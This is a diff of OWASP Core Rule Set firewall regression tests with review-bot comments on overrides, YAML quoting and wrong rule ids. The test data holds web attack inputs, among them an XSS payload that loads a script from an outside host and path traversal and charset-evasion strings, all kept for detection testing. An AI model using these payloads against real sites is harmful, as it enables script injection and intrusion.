@@ -13,9 +13,14 @@ test_overrides: status: 400 - rule_id: 920100 test_ids: [8] - reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" + reason: | + On Apache is not allowed to put a colon in the path. + Nginx, on the other hand, allows it, in this case, returns a 200. /index.html:80?I=Like&Apples=Today#tag. + Note that the colon is a legal character in a regular path segment, according to the RFC. output: - status: 404 + status: 200 + log: + no_expect_ids: [920100] - rule_id: 920100 test_ids: [14] reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." @@ -32,6 +37,15 @@ test_overrides: reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" output: status: 400 + - rule_id: 920260 + test_ids: [1, 3] + reason: | + Nginx replaces the `%u` in the URI with `\xf`. This might be a bug. + See https://github.com/owasp-modsecurity/ModSecurity/issues/3135 + output: + status: 200 + log: + no_expect_ids: [920260] - rule_id: 920270 test_ids: [4] reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" 
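Review bot: The reworked `reason` for 920100 test 8 uses a `|` literal block scalar, which keeps a trailing newline in the value; `|-` (or `>-`, since this is prose) drops it and is the form the other multi-line reasons in this file should share. The first sentence also reads awkwardly: `On Apache is not allowed to put a colon in the path.` would be clearer as `Apache does not allow a colon in the path.`. The RFC remark is useful; naming the section (path-segment characters) would let a reader verify it without guessing.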
@@ -39,20 +53,70 @@ test_overrides: status: 200 log: expect_ids: [920270] + - rule_id: 920274 + test_ids: [1] + reason: "Nginx will accept the value for the Host header, the rule should trigger" + output: + status: 200 + log: + expect_ids: [920274] - rule_id: 920290 test_ids: [4] reason: "Nginx returns 400 if Host header is missing" output: status: 400 + - rule_id: 920360 + test_ids: [1] + reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920370 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920380 + test_ids: [1] + reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value + output: + status: 200 + log: + no_expect_ids: [920280] + - rule_id: 920390 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920390] - rule_id: 920430 test_ids: [8] reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." output: status: 505 - - rule_id: 932200 - test_ids: [13] - reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result" + - rule_id: 920610 + test_ids: [2] + reason: "nginx happily accepts fragments" + output: + status: 200 + log: + expect_ids: [920610] + - rule_id: 920620 + test_ids: [1] + reason: "nginx retains multiple separate Content-Type headers, which is what this rule is looking for" + output: + log: + expect_ids: [920620] + - rule_id: 930110 + test_ids: [7] + reason: "nginx does not strip the dots from the URL (which http apparently does), hence ModSecurity sees them and the rule matches" output: + log: + expect_ids: [930110] - rule_id: 933110 test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27] reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" 
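Review bot: The new 920260 override accepts a 200 with `no_expect_ids: [920260]` for tests 1 and 3, which means the `%u`-encoded payloads those tests send are now asserted as undetected on nginx + libmodsecurity; the `reason` attributes this to how the URI is rewritten and calls it a possible bug, but the effect is that the suite documents a bypass of 920260 on this platform as expected behaviour. The entry should say so explicitly, e.g. `# Known detection gap on nginx; remove this override once the linked ModSecurity issue is resolved`, so it is revisited rather than kept indefinitely. Whether a tracking entry exists outside this file is not visible from the hunk.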
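Review bot: The 920370 and 920380 overrides added here carry the wrong ids in their negative assertions, `no_expect_ids: [920360]` under `rule_id: 920370` and `no_expect_ids: [920280]` under `rule_id: 920380`; as written they check nothing about the rule they override and should be `no_expect_ids: [920370]` and `no_expect_ids: [920380]`. The same copy-paste appears in the httpd overrides in this commit, so both files need the correction. Separately, the 930110 reason says `(which http apparently does)`, where `httpd` is presumably meant.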
@@ -69,43 +133,46 @@ test_overrides: reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" output: expect_error: true - - rule_id: 941180 - test_ids: [7] - reason: "Rule remove by range doesn't work on v3 if used via ctl. https://github.com/coreruleset/coreruleset/pull/3302" - output: - expect_error: true - rule_id: 942131 test_ids: [3, 5, 7] reason: "v3 log bug, the first part of the chain always produces a log" output: - expect_error: true - - rule_id: 942550 - test_ids: [26, 28, 30, 32] - reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" - output: - expect_error: true + log: + expect_ids: [942131] - rule_id: 944100 test_ids: [11, 12, 15, 16] - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" output: - expect_error: true + log: + expect_ids: [944100] + - rule_id: 944110 + test_ids: [11, 12, 15, 16] + reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + output: + log: + expect_ids: [944110] - rule_id: 944120 test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" output: - expect_error: true + log: + expect_ids: [944120] - rule_id: 944140 test_ids: [3, 8] - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. 
A libmodsecurity3 plugin could solve this" + reason: "The header name `X_Filename` is considered invalid and is removed by nginx" output: - expect_error: true + status: 200 + log: + no_expect_ids: [944140] - rule_id: 944210 test_ids: [6, 7, 23, 24, 40, 41] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" output: - expect_error: true + log: + expect_ids: [944210] - rule_id: 980170 test_ids: [1, 2] reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" output: - expect_error: true + log: + no_expect_ids: [980170] diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 573fce3c6..9dd14be72 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 3dc6d556b..74d0073f8 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -194,7 +194,7 @@ tests: Keep-Alive: '300' Proxy-Connection: keep-alive User-Agent: "OWASP CRS test agent" - method: " GET" + method: "\tGET" port: 80 uri: "/get" version: HTTP/1.1 
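Review bot: The wording fix `always present` is applied to the 944100 reason and to the newly added 944110 entry, but the adjacent 944120 and 944210 entries in this hunk still read `always presents`; all four should be corrected together. The rewritten 944140 reason (`X_Filename` removed by nginx) describes the same nginx behaviour as the 933110 entry above, so a short cross-reference such as `reason: "... removed by nginx (see 933110)"` would tell a reader that both overrides stand or fall together.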
@@ -242,7 +242,7 @@ tests: dest_addr: 127.0.0.1 method: GET port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\"script\\");x.src = \\"//sdl.me/popup.js?//\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//' + uri: '/get/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//' headers: User-Agent: "OWASP CRS test agent" Host: localhost diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 69d2d96be..703b8f78f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml @@ -55,7 +55,7 @@ tests: Content-Disposition: form-data; name="fi=le"; filename="test" Content-Type: text/plain - email: security@example.com + email: security@example.com -----------------------------627652292512397580456702590 Content-Disposition: form-data; name="note" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index e1e68b7d8..dbd5fe977 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml 
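Review bot: The `uri` value is single-quoted, so YAML performs no escape processing and the new `\\\"` sequences reach the wire as three backslashes followed by a quote; nothing on the line records which nesting level each backslash is meant for. A comment above the line would spare the next reader from re-deriving it, e.g. `# single-quoted: sent verbatim; \\\" is presumably a JS-escaped quote inside the setTimeout string argument` (hedged, since the intended target parser is not stated in the test).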
@@ -11,19 +11,19 @@ tests: dest_addr: "127.0.0.1" port: 80 # this sends a chunked POST request with content "Hi CRS" in two lines - # POST / HTTP/1.1 - # Accept: */* - # Host: localhost - # Transfer-Encoding: chunked - # User-Agent: "OWASP CRS test agent" - # - # 3 - # Hi - # 3 - # CRS - # 0 - # - encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + # POST / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" output: log: no_expect_ids: [920171] @@ -34,19 +34,19 @@ tests: dest_addr: "127.0.0.1" port: 80 # this sends a chunked GET request with content "Hi CRS" in two lines - # GET / HTTP/1.1 - # Accept: */* - # Host: localhost - # Transfer-Encoding: chunked - # User-Agent: "OWASP CRS test agent" - # - # 3 - # Hi - # 3 - # CRS - # 0 - # - encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQozDQpIaSANCjMNCkNSUw0KMA0KDQo=" + # GET / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" output: log: expect_ids: [920171] 
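Review bot: The new `encoded_request` values contain `\n` escapes inside a double-quoted scalar, so the decoded YAML string holds real newline characters at what look like the 76-column wrap points of a standard `base64` tool. Whether that decodes depends on the runner's base64 decoder (Go's `encoding/base64` skips CR/LF, many other decoders reject them), so the test's validity now rests on an undocumented runner property; the removed line kept the value on a single line and had no such dependency. The same applies to the `@@ -34` hunk here and the `@@ -57` hunk on the next line. Either re-join the value onto one line or add `# embedded newlines in the base64 are tolerated by the runner's decoder` so the dependency is visible.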
@@ -57,19 +57,19 @@ tests: dest_addr: "127.0.0.1" port: 80 # this sends a chunked HEAD request with content "Hi CRS" in two lines - # HEAD / HTTP/1.1 - # Accept: */* - # Host: localhost - # Transfer-Encoding: chunked - # User-Agent: "OWASP CRS test agent" - # - # 3 - # Hi - # 3 - # CRS - # 0 - # - encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + # HEAD / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" output: log: expect_ids: [920171] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index c962b7cb2..5ddeb17d6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -46,9 +46,6 @@ tests: log: expect_ids: [920270] - test_id: 4 - desc: | - This causes apache to error before it gets to CRS. Therefore, - we'll mark this as a status 400 now until the FTW OR output is added stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml index bcd73842f..5c6752cea 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml 
@@ -4,10 +4,6 @@ meta: rule_id: 920274 tests: - test_id: 1 - desc: | - Apache will just error on this and return 400, as a result we look for forbidden or 400. - In the future FTW should support OR versus AND output. - https://github.com/coreruleset/ftw/issues/19 stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml index 04b8eac71..a972412b5 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml @@ -54,14 +54,9 @@ tests: - input: dest_addr: "127.0.0.1" port: 80 + version: "HTTP/1.1" + uri: "/get" encoded_request: "R0VUIC8gSFRUUC8xLjANCkhvc3Q6DQoNCg==" - # Request: - # - # GET / HTTP/1.0 - # Host: - # - # CRS prefers the use of encoded_request over raw_request. - # Known reason is encoding issues with raw_request. output: log: expect_ids: [920290] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml index ca5d84fbb..74db85b94 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Request Missing an Accept Header (920300) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml index 3c3da7b19..7f5384198 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None # ARG_NAME_LENGTH needs to be set in crs-config rule_id: 920360 tests: 
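Review bot: The added `version: "HTTP/1.1"` and `uri: "/get"` in the 920290 hunk contradict the `encoded_request` on the next line, which decodes to `GET / HTTP/1.0` followed by an empty `Host:` header (the removed comment spelled this out). If the runner sends the encoded request as-is these two keys are inert and misleading; if they take precedence, the test no longer sends the missing-Host request the override file describes. The same mismatch appears in the 920620 hunk further down, where `uri: "/post"` sits beside an encoded request whose request line decodes to `GET /get HTTP/1.1`. Keeping the decoded request as a comment, as the removed lines did, would let a reader check the two against each other.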
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml index 21b412ddb..cbfbb6eff 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml @@ -58,10 +58,11 @@ tests: output: log: no_expect_ids: [920430] - - # Currently FTW won't process HTTP 1.0 simple response items - # This request generates such a response, so even though it will - # generate the alert, it will error. - test_id: 5 + - test_id: 5 + desc: | + Request line without version will be interpreted as HTTP/0.9. + Note that go-ftw currently can't handle the generated response though and + will see a premature EOF. stages: - input: dest_addr: "127.0.0.1" @@ -74,6 +75,7 @@ tests: uri: "/" output: expect_error: true + expect_ids: [920430] - test_id: 6 stages: - input: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml index bc8950b96..48cf6f7a5 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: URL file extension is restricted by policy (920440) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 3d18bfad0..6999af956 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -225,7 +225,7 @@ tests: # version: "HTTP/1.1" # output: # log: - # epxect_ids:: [920480] + # epxect_ids:: [920480] - test_id: 7 stages: - input: 
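Review bot: In the `@@ -74,6 +75,7 @@` hunk of 920430.yaml the new `expect_ids: [920430]` is placed directly under `output:` next to `expect_error: true`, whereas the first hunk of the same file and every other test on this page nest id lists under `log:` (`log:` / `  no_expect_ids: [920430]`). Unless the runner accepts both placements, the key is ignored or rejected rather than asserted; it should read `log:` followed by `  expect_ids: [920430]`. Given the new desc says the runner sees a premature EOF for this response, it is also worth stating in the desc whether the log assertion is expected to be evaluated at all when `expect_error` is set.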
@@ -301,10 +301,10 @@ tests: port: 80 method: "POST" headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - # double charset may cause evasion - Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" + User-Agent: "OWASP CRS test agent" + Host: "localhost" + # double charset may cause evasion + Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" data: "test=value" version: "HTTP/1.1" output: @@ -338,12 +338,12 @@ tests: # User-Agent: "OWASP CRS test agent" # Host: "localhost" # Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" #double charset may cause evasion - # uri: "/" - # data: "test=value" - # version: "HTTP/1.1" - # output: - # log: - # expect_ids: [920480] + # uri: "/" + # data: "test=value" + # version: "HTTP/1.1" + # output: + # log: + # expect_ids: [920480] - test_id: 14 stages: - input: @@ -353,7 +353,6 @@ tests: headers: User-Agent: "OWASP CRS test agent" Host: "localhost" - # random other IBM charset Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\"" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" @@ -371,7 +370,6 @@ tests: headers: User-Agent: "OWASP CRS test agent" Host: "localhost" - # random other IBM charset Content-Type: "application/x-www-form-urlencoded; charset='utf-8'" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" @@ -389,7 +387,6 @@ tests: headers: User-Agent: "OWASP CRS test agent" Host: "localhost" - # random other IBM charset Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\"" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml index 33745cc40..95cc9b70c 100644 
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml @@ -11,7 +11,7 @@ tests: port: 80 method: "POST" headers: - # User-Agent must starts with "UP" + # User-Agent must start with "UP" User-Agent: "UP OWASP CRS test agent" Host: "localhost" Content-Type: "application/x-www-form-urlencoded; charset=utf-8" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml index 2e2f57606..1f3195ea7 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml @@ -5,7 +5,7 @@ meta: rule_id: 920540 tests: - test_id: 1 - desc: "Unicode character bypass issue #2512: alert() alert" + desc: "Unicode character bypass issue #2512: alert() \u0061lert" stages: - input: dest_addr: "127.0.0.1" @@ -23,7 +23,7 @@ tests: log: expect_ids: [920540] - test_id: 2 - desc: "Unicode character bypass issue #2512: eval() eval()" + desc: "Unicode character bypass issue #2512: eval() \u0065val()" stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml index f3cb87bce..8042efe29 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml 
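Review bot: In the new 920540 `desc` values the `\u0061` and `\u0065` escapes are inside double quotes, so the YAML parser resolves them to `a` and `e` and the descriptions read exactly as the removed lines did (`alert() alert`, `eval() eval()`). If the intent is to show that the payload uses a Unicode escape, single-quote the value or double the backslash, e.g. `desc: 'Unicode character bypass issue #2512: alert() \u0061lert'`. The same applies to the test 2 hunk in the same file.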
@@ -14,8 +14,9 @@ tests: dest_addr: "127.0.0.1" port: 80 encoded_request: "R0VUIC9nZXQgSFRUUC8xLjENCkhvc3Q6IGxvY2FsaG9zdA0KVXNlci1BZ2VudDogT1dBU1AgQ1JTIHRlc3QgYWdlbnQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24NCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veG1sDQoNCg==" + uri: "/post" + version: "HTTP/1.1" output: - # match reflected request in JSON response from httpbin - response_contains: |- - Content-Type\W*: \[\W*application/json, application/xml - no_expect_ids: [920620] + status: 200 + log: + no_expect_ids: [920620] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml index 26ee82fe0..ed8449861 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "HTTP Response Splitting" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 24d5448c7..54f63b364 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index 7b322393a..881e2d4d1 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml 
@@ -1,7 +1,6 @@ --- meta: author: "jptosso, azurit" - description: "Tests to trigger, or not trigger 921170 and 921180" rule_id: 921180 tests: - # Standard GET request @@ -84,8 +83,8 @@ tests: output: log: no_expect_ids: [921180] - - # HPP payload with multiple iterations - test_id: 6 + - test_id: 6 + desc: query parameter repetition stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml index b217eaa0b..65f94b99a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml @@ -104,7 +104,9 @@ tests: log: no_expect_ids: [930110] - test_id: 7 - desc: "Path Traversal Attack (/../) query string" + desc: | + Path Traversal Attack (/../) query string. + Note: apparently, httpd strips dots, ModSecurity never sees them in `REQUEST_URI`` stages: - input: dest_addr: "localhost" @@ -211,7 +213,7 @@ tests: X-FTW: "This should trip" User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?a=..;.\\.;\\." + uri: "/get?a=..;.\\.;\\." version: "HTTP/1.1" output: log: diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 3a2b2268b..084806527 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index 79f562df5..30983314c 100644 
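Review bot: `desc: query parameter repetition` in the 921180 `@@ -84` hunk drops the term the removed comment carried, `HPP payload with multiple iterations`, and HTTP parameter pollution is what this rule is about, so the new description is less searchable than the comment it replaces; `desc: "HTTP parameter pollution: repeated query parameter, multiple iterations"` keeps both. The value is also the only unquoted `desc` visible on this page.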
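Review bot: The new 930110 desc block ends with a stray second backtick after `REQUEST_URI` (two closing backticks where one is meant). The claim `apparently, httpd strips dots` is given without a pointer; if this was observed rather than read from documentation, naming where it was seen (the matching entry in the nginx override file, or an issue) would let someone re-verify it when httpd behaviour changes.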
